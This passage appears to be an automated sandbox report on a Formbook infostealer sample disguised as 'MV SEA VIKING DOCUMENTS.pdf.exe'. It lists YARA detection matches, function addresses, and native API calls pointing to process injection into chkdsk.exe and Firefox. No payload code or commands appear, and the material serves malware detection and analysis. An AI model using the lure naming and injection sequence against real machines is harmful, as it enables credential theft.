      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1D987035_2_1F1D9870
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1EB87035_2_1F1EB870
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1B686835_2_1F1B6868
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F2498B235_2_1F2498B2
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1E688235_2_1F1E6882
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1D58B035_2_1F1D58B0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F2878F335_2_1F2878F3
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1D28C035_2_1F1D28C0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F2818DA35_2_1F2818DA
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1C170C35_2_1F1C170C
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1DA76035_2_1F1DA760
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F28675735_2_1F286757
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F26D62C35_2_1F26D62C
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1EC60035_2_1F1EC600
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F27D64635_2_1F27D646
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1F467035_2_1F1F4670
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F2436EC35_2_1F2436EC
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F28F6F635_2_1F28F6F6
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1CC6E035_2_1F1CC6E0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F29A52635_2_1F29A526
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F28F5C935_2_1F28F5C9
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F2875C635_2_1F2875C6
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1D044535_2_1F1D0445
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F23D48035_2_1F23D480
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1DE31035_2_1F1DE310
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F28F33035_2_1F28F330
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1C138035_2_1F1C1380
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1ED21035_2_1F1ED210
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F28124C35_2_1F28124C
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1BD2EC35_2_1F1BD2EC
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1BF11335_2_1F1BF113
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F26D13035_2_1F26D130
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F29010E35_2_1F29010E
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F21717A35_2_1F21717A
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1EB1E035_2_1F1EB1E0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F27E07635_2_1F27E076
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F20508C35_2_1F20508C
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1C00A035_2_1F1C00A0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F1DB0D035_2_1F1DB0D0
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_1F2870F135_2_1F2870F1
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_0166ACCC35_2_0166ACCC
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_0166F63735_2_0166F637
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_0166860235_2_01668602
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_01666F7435_2_01666F74
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 35_2_0166EFF135_2_0166EFF1
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: edgegdi.dll
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeSection loaded: edgegdi.dll
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeSection loaded: edgegdi.dll
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeSection loaded: edgegdi.dll
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeSection loaded: edgegdi.dll
      Source: MV SEA VIKING DOCUMENTS.pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: 0000000D.00000002.2763779183.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000D.00000002.2763779183.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000010.00000000.2599606757.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000010.00000000.2599606757.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000015.00000002.7208295092.0000000005000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000015.00000002.7208295092.0000000005000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000D.00000002.2792237612.000000001EE30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000D.00000002.2792237612.000000001EE30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000010.00000000.2534241139.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000010.00000000.2534241139.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000015.00000002.7208839040.0000000005030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000015.00000002.7208839040.0000000005030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352D
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 30_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,30_2_0040352D
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 34_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,34_2_0040352D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 0549E692 appears 86 times
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 054AEF10 appears 105 times
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 05465050 appears 36 times
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 0541B910 appears 253 times
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 05477BE4 appears 95 times
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: String function: 1F1CB910 appears 253 times
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: String function: 1F227BE4 appears 95 times
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: String function: 1F24E692 appears 86 times
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: String function: 1F215050 appears 36 times
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: String function: 1F25EF10 appears 105 times
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: String function: 1F205050 appears 36 times
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: String function: 1F24EF10 appears 105 times
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: String function: 00402DA6 appears 51 times
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: String function: 1F217BE4 appears 95 times
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: String function: 1F1BB910 appears 253 times
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: String function: 1F23E692 appears 86 times
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_0245B2A6 NtAllocateVirtualMemory,0_2_0245B2A6
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_02460B17 LoadLibraryA,NtProtectVirtualMemory,0_2_02460B17
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_0245FC11 NtWriteVirtualMemory,LoadLibraryA,0_2_0245FC11
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_024610EA NtResumeThread,0_2_024610EA
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_02452FC1 NtWriteVirtualMemory,0_2_02452FC1
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_02458BDC NtWriteVirtualMemory,LoadLibraryA,0_2_02458BDC
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_0245F5CB NtWriteVirtualMemory,0_2_0245F5CB
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F212F00 NtCreateFile,LdrInitializeThunk,13_2_1F212F00
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F212E50 NtCreateSection,LdrInitializeThunk,13_2_1F212E50
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F212EB0 NtProtectVirtualMemory,LdrInitializeThunk,13_2_1F212EB0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F212ED0 NtResumeThread,LdrInitializeThunk,13_2_1F212ED0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F212D10 NtQuerySystemInformation,LdrInitializeThunk,13_2_1F212D10
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F212DA0 NtReadVirtualMemory,LdrInitializeThunk,13_2_1F212DA0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F212DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,13_2_1F212DC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F212C30 NtMapViewOfSection,LdrInitializeThunk,13_2_1F212C30
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F212C50 NtUnmapViewOfSection,LdrInitializeThunk,13_2_1F212C50
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F212CF0 NtDelayExecution,LdrInitializeThunk,13_2_1F212CF0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F212B10 NtAllocateVirtualMemory,LdrInitializeThunk,13_2_1F212B10
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F212B90 NtFreeVirtualMemory,LdrInitializeThunk,13_2_1F212B90
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F212BC0 NtQueryInformationToken,LdrInitializeThunk,13_2_1F212BC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F2129F0 NtReadFile,LdrInitializeThunk,13_2_1F2129F0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F2134E0 NtCreateMutant,LdrInitializeThunk,13_2_1F2134E0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F212F30 NtOpenDirectoryObject,13_2_1F212F30
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F212FB0 NtSetValueKey,13_2_1F212FB0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F212E00 NtQueueApcThread,13_2_1F212E00
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F212E80 NtCreateProcessEx,13_2_1F212E80
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F212EC0 NtQuerySection,13_2_1F212EC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F212D50 NtWriteVirtualMemory,13_2_1F212D50
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F212C20 NtSetInformationFile,13_2_1F212C20
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F213C30 NtOpenProcessToken,13_2_1F213C30
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F212C10 NtOpenProcess,13_2_1F212C10
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F213C90 NtOpenThread,13_2_1F213C90
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F212CD0 NtEnumerateKey,13_2_1F212CD0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F212B20 NtQueryInformationProcess,13_2_1F212B20
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F212B00 NtQueryValueKey,13_2_1F212B00
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F212B80 NtCreateKey,13_2_1F212B80
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F212BE0 NtQueryVirtualMemory,13_2_1F212BE0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F212A10 NtWriteFile,13_2_1F212A10
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F212AA0 NtQueryInformationFile,13_2_1F212AA0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F212A80 NtClose,13_2_1F212A80
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F212AC0 NtEnumerateValueKey,13_2_1F212AC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F2129D0 NtWaitForSingleObject,13_2_1F2129D0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F2138D0 NtGetContextThread,13_2_1F2138D0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F214570 NtSuspendThread,13_2_1F214570
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F214260 NtSetContextThread,13_2_1F214260
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_0167134E LdrInitializeThunk,NtProtectVirtualMemory,13_2_0167134E
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_0167151A Sleep,NtProtectVirtualMemory,13_2_0167151A
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_01671360 LdrInitializeThunk,NtProtectVirtualMemory,13_2_01671360
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_01671342 LdrInitializeThunk,NtProtectVirtualMemory,13_2_01671342
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_016713F4 NtProtectVirtualMemory,13_2_016713F4
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_01671575 NtProtectVirtualMemory,13_2_01671575
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_01671598 NtProtectVirtualMemory,13_2_01671598
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054634E0 NtCreateMutant,LdrInitializeThunk,21_2_054634E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05462D10 NtQuerySystemInformation,LdrInitializeThunk,21_2_05462D10
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05462DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,21_2_05462DC0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05462C30 NtMapViewOfSection,LdrInitializeThunk,21_2_05462C30
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05462CF0 NtDelayExecution,LdrInitializeThunk,21_2_05462CF0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05462F00 NtCreateFile,LdrInitializeThunk,21_2_05462F00
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05462FB0 NtSetValueKey,LdrInitializeThunk,21_2_05462FB0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05462E50 NtCreateSection,LdrInitializeThunk,21_2_05462E50
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054629F0 NtReadFile,LdrInitializeThunk,21_2_054629F0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05462B00 NtQueryValueKey,LdrInitializeThunk,21_2_05462B00
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05462B10 NtAllocateVirtualMemory,LdrInitializeThunk,21_2_05462B10
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05462BC0 NtQueryInformationToken,LdrInitializeThunk,21_2_05462BC0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05462B80 NtCreateKey,LdrInitializeThunk,21_2_05462B80
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05462B90 NtFreeVirtualMemory,LdrInitializeThunk,21_2_05462B90
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05462AC0 NtEnumerateValueKey,LdrInitializeThunk,21_2_05462AC0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05462A80 NtClose,LdrInitializeThunk,21_2_05462A80
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05464570 NtSuspendThread,21_2_05464570
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05464260 NtSetContextThread,21_2_05464260
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05462D50 NtWriteVirtualMemory,21_2_05462D50
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05462DA0 NtReadVirtualMemory,21_2_05462DA0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05462C50 NtUnmapViewOfSection,21_2_05462C50
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05462C10 NtOpenProcess,21_2_05462C10
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05462C20 NtSetInformationFile,21_2_05462C20
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05463C30 NtOpenProcessToken,21_2_05463C30
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05462CD0 NtEnumerateKey,21_2_05462CD0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05463C90 NtOpenThread,21_2_05463C90
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05462F30 NtOpenDirectoryObject,21_2_05462F30
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05462E00 NtQueueApcThread,21_2_05462E00
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05462EC0 NtQuerySection,21_2_05462EC0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05462ED0 NtResumeThread,21_2_05462ED0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05462E80 NtCreateProcessEx,21_2_05462E80
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05462EB0 NtProtectVirtualMemory,21_2_05462EB0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054629D0 NtWaitForSingleObject,21_2_054629D0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054638D0 NtGetContextThread,21_2_054638D0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05462B20 NtQueryInformationProcess,21_2_05462B20
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05462BE0 NtQueryVirtualMemory,21_2_05462BE0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05462A10 NtWriteFile,21_2_05462A10
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05462AA0 NtQueryInformationFile,21_2_05462AA0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_008885E0 NtCreateFile,21_2_008885E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_00888690 NtReadFile,21_2_00888690
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_008887C0 NtAllocateVirtualMemory,21_2_008887C0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_00888710 NtClose,21_2_00888710
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0088868A NtReadFile,21_2_0088868A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0088870A NtClose,21_2_0088870A
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 33_2_00000244A227AD02 NtCreateFile,33_2_00000244A227AD02
